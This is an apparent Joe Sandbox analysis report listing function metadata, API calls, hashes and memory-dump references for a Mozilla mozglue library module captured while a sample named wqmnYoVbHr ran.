                                                                  • API String ID: 0-3968268099
                                                                  • Opcode ID: d83cf5fb21d651493d188748d893cfa39d2aad0ffa3ba163a153159ab8ea6738
                                                                  • Instruction ID: de37f27492b7becc254744e07725c1a1794d971f401dc2a2b99cfa8698c15223
                                                                  • Opcode Fuzzy Hash: d83cf5fb21d651493d188748d893cfa39d2aad0ffa3ba163a153159ab8ea6738
                                                                  • Instruction Fuzzy Hash: 8A52A270A083458FD734DF18C65075ABBE2BBCB318F248D1ED9A687B92D7359849CB42
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__aullrem
                                                                  • String ID: -Infinity$NaN
                                                                  • API String ID: 3839614884-2141177498
                                                                  • Opcode ID: 080ffe349c042b88074dfe0338f2827a533376b176401b9dacd32e4f48051b9d
                                                                  • Instruction ID: 5de2cf88f840bb79553bffdeeb543a53edd2061b346811e944ebce11f9c95e71
                                                                  • Opcode Fuzzy Hash: 080ffe349c042b88074dfe0338f2827a533376b176401b9dacd32e4f48051b9d
                                                                  • Instruction Fuzzy Hash: 6EC1DE32E103198BDB24CFA8C8507EEB7BAFB85314F144529D445ABB84DB78ED49CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $-$0$0$1$8$9$@
                                                                  • API String ID: 0-3654031807
                                                                  • Opcode ID: 00c6f692a5c5dd14b5f6ca8f3800eaf8df497148bfcbddac2a83b6ff403928bd
                                                                  • Instruction ID: e965ac0379d6289a131943d05b515568a3c937336b8cc6654d996fda4fbdf7fc
                                                                  • Opcode Fuzzy Hash: 00c6f692a5c5dd14b5f6ca8f3800eaf8df497148bfcbddac2a83b6ff403928bd
                                                                  • Instruction Fuzzy Hash: D962AB7168C3458FD721EF18C69075ABBE2AF86358F184E1EE4D54BA91C335E885CB83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ' $0$0$1$9$@
                                                                  • API String ID: 0-2946122015
                                                                  • Opcode ID: 9cbaa9f6c4a836d52ef0b4d3ce091383d5b16aab5089488752cfe7417b7cc491
                                                                  • Instruction ID: cd0e7eaee474c9fff347dfc16ea87fd0fae398f18adc311540f75f4f25d394e4
                                                                  • Opcode Fuzzy Hash: 9cbaa9f6c4a836d52ef0b4d3ce091383d5b16aab5089488752cfe7417b7cc491
                                                                  • Instruction Fuzzy Hash: EF82C1315093159BD7208F19C2802EEB7F2EB85758F778E29E8D547A90D335F885CB82
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv$__aullrem
                                                                  • String ID:
                                                                  • API String ID: 2022606265-0
                                                                  • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                  • Instruction ID: fc4ca9689f2c1fe0e2309a6cc33e021e4dd032f18352db57a704b282715e007c
                                                                  • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                  • Instruction Fuzzy Hash: 91321532B046158FC728DE2CC890656BBE6AFC9350F098A7DE495CB396D730ED05CB91
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C938A4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                  • Instruction ID: e31d20992e6b381f33210ac608a77680ec5771b39a7836af266536a8f63f8c9c
                                                                  • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                  • Instruction Fuzzy Hash: E6B1D772E0022A8FDB14CF68CC907A9B7B6EF95314F1912AAC54DDB785D730E985CB90
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C9388F0
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C93925C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                  • Instruction ID: ac16d2bdd9d7d5e5d73b4da1cea1c1d261937170d6b5dd9d12f90cdb7cb0e262
                                                                  • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                  • Instruction Fuzzy Hash: 85B1D572E0422A8BCB14CE58CC807ADB7B6EF95314F15026AC949EB785D730E989CB90
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C938E18
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C93925C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                  • Instruction ID: 00d68df253db41281904693ffd0e3211c1032b1df03700b44abde737317a6fed
                                                                  • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                  • Instruction Fuzzy Hash: EFA1D672A041278FCB14CE68CC807A9B7B6EF95314F1542BAC94DEB785D730E999CB90
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C917A81
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C917A93
                                                                    • Part of subcall function 6C8E5C50: GetTickCount64.KERNEL32 ref: 6C8E5D40
                                                                    • Part of subcall function 6C8E5C50: EnterCriticalSection.KERNEL32(6C94F688), ref: 6C8E5D67
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C917AA1
                                                                    • Part of subcall function 6C8E5C50: __aulldiv.LIBCMT ref: 6C8E5DB4
                                                                    • Part of subcall function 6C8E5C50: LeaveCriticalSection.KERNEL32(6C94F688), ref: 6C8E5DED
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C917B31
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                  • String ID:
                                                                  • API String ID: 4054851604-0
                                                                  • Opcode ID: a2a18155133348f23f5811488dedcd3c7b6e4a2c51749466a53b707c9c614962
                                                                  • Instruction ID: 96558ddbd1980e4021da260a39ad875bd643bb17498263d1952b0b48ca4df643
                                                                  • Opcode Fuzzy Hash: a2a18155133348f23f5811488dedcd3c7b6e4a2c51749466a53b707c9c614962
                                                                  • Instruction Fuzzy Hash: BAB15D3560C3898BCB14CE24C49165FB7E2BFC9318F154A5CE99567B91DB70E90ACB82
                                                                  APIs
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C906D45
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C906E1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                  • String ID:
                                                                  • API String ID: 4169067295-0
                                                                  • Opcode ID: 2b8cd8cfe421bc663a4bdbdb66c95b7211cee1bbd38721e1402282b507047a7f
                                                                  • Instruction ID: 8902923dde2e144b9a2601eb3281d117e54932c7440f00af7648a258cefbb676
                                                                  • Opcode Fuzzy Hash: 2b8cd8cfe421bc663a4bdbdb66c95b7211cee1bbd38721e1402282b507047a7f
                                                                  • Instruction Fuzzy Hash: 17A18D706183858FC715CF24C4907AEBBF6BF98308F54491DE98A87B51DB70E898CB92
                                                                  APIs
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C92B720
                                                                  • RtlNtStatusToDosError.NTDLL ref: 6C92B75A
                                                                  • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C8FFE3F,00000000,00000000,?,?,00000000,?,6C8FFE3F), ref: 6C92B760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                  • String ID:
                                                                  • API String ID: 304294125-0
                                                                  • Opcode ID: e4a653ddc201184f4a858d69a76845474772c8029a56ded76336ff01bfd8fc5b
                                                                  • Instruction ID: ff8ab75de1751b6b2682d4bbc7b824085a0b8b17a318449f9549c8bc63e9165e
                                                                  • Opcode Fuzzy Hash: e4a653ddc201184f4a858d69a76845474772c8029a56ded76336ff01bfd8fc5b
                                                                  • Instruction Fuzzy Hash: ACF0FFB0A0421CAEEF009AE08C80BEEB7FC9B0471DF106229E552619C0C778D68CC660
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C8E4777
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 4275171209-1351931279
                                                                  • Opcode ID: 139abff975ca14471d1efd762311ee40036031a09cc2a449ec9a86e0946879f7
                                                                  • Instruction ID: d264eff4bef61a838afbe9e23cce03f2e8dd86f87d83a677c7a4ea5c9b524fec
                                                                  • Opcode Fuzzy Hash: 139abff975ca14471d1efd762311ee40036031a09cc2a449ec9a86e0946879f7
                                                                  • Instruction Fuzzy Hash: D3B25F71A057018FD328CF59C690715BBE2BFCA324F29CB6DE4698B6A5D771E841CB80
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID:
                                                                  • API String ID: 3732870572-0
                                                                  • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                  • Instruction ID: f334a2c25650ed746dfeb9cb0e93a67f1788a2536880845c2bf94e2c4791ad29
                                                                  • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                  • Instruction Fuzzy Hash: B8326032F101198BDF1CCE9CC4A1BBEB7B6FB88300F15852AD446BB794D6389D458B95
                                                                  APIs
                                                                  • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C8D03D4,?), ref: 6C92B955
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C92B9A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryQueryVirtualrand_s
                                                                  • String ID:
                                                                  • API String ID: 1889792194-0
                                                                  • Opcode ID: b7514a8b0f85d49ad555a77a263c2630e2ad016bb5c46db2b4743cf1a23e17cc
                                                                  • Instruction ID: 2e731065da22088292b5ae6c15f7149b5d5799dd2d2574f8ca6cd7adc5b3a495
                                                                  • Opcode Fuzzy Hash: b7514a8b0f85d49ad555a77a263c2630e2ad016bb5c46db2b4743cf1a23e17cc
                                                                  • Instruction Fuzzy Hash: A941E531E012199FCF04CFA8D880ADEB7FAEF88358F148129E516A7704DB34E8458B90
                                                                  APIs
                                                                  • memcmp.VCRUNTIME140(?,?,6C8D4A63,?,?), ref: 6C905F06
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memcmp
                                                                  • String ID:
                                                                  • API String ID: 1475443563-0
                                                                  • Opcode ID: e208a43ea0b57691dbe677ce52fa33656676752fb4cd0c784dfd69174480b71e
                                                                  • Instruction ID: c4cf12b05139970789aacf7a6e738fbba661329d31d5e0995437670565bc8bb3
                                                                  • Opcode Fuzzy Hash: e208a43ea0b57691dbe677ce52fa33656676752fb4cd0c784dfd69174480b71e
                                                                  • Instruction Fuzzy Hash: F9C1D275E012199BCB04CF99C1906EEBBF6FF89318F28415DD855ABB44D732A806CB94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 592c6063e7c2a16478f75a909f0e59d797909a892fee0054fc1f0ffcff70e7e3
                                                                  • Instruction ID: e990072cf4065bbbf61dfa43717ffe2d377f1c32dec8a58b9349858f47bcc9a6
                                                                  • Opcode Fuzzy Hash: 592c6063e7c2a16478f75a909f0e59d797909a892fee0054fc1f0ffcff70e7e3
                                                                  • Instruction Fuzzy Hash: 8E42B132B187508BD314CE3CC59175AB3E2BFC9364F198B2EE999A7790D734D9418B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                  • Instruction ID: 8f0bb474193310a0af4bf8faee78a1b9092978a7d0aaf86efc714c76164b994a
                                                                  • Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                  • Instruction Fuzzy Hash: 8B32F871E0062ACFCB14CF98C990AADF7F6BF88304F54916AC949A7745D731A986CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                  • Instruction ID: 56d87826e85427aa87605f9953b14911102201f303ed19c7b3d82ca7ab055fa9
                                                                  • Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                  • Instruction Fuzzy Hash: 9822D771E00229CFCB14CF98C980AADF7B6FF88304F6491AAC559A7745D731A986CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                  • Instruction ID: 25e41e45261ff8fe544a5aa74138e8420b23a8972e0e997bddec8495abebad5a
                                                                  • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                  • Instruction Fuzzy Hash: 6E223875E00619CFDB24CF98C990AADF7B2FF88304F5485A9C45AAB705D770A986CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c5853401156095e33621a7f687fe82b58fad1fdbb491488f2db2f12c6cdb9caf
                                                                  • Instruction ID: d3740f14614c5feb4704c71d90a96c305a306ec2c4173e58aea2b46b41ab98d8
                                                                  • Opcode Fuzzy Hash: c5853401156095e33621a7f687fe82b58fad1fdbb491488f2db2f12c6cdb9caf
                                                                  • Instruction Fuzzy Hash: 2EF16B716087558FDB00CFA8C8807AAB7E6AFC5318F159A2DE4EC877C1EB74D8458792
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
